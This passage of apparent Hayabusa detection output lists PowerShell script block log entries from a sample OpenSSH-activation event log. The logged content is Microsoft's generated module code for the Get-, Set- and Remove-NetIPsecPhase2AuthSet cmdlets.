$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) 
{ $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { 
throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
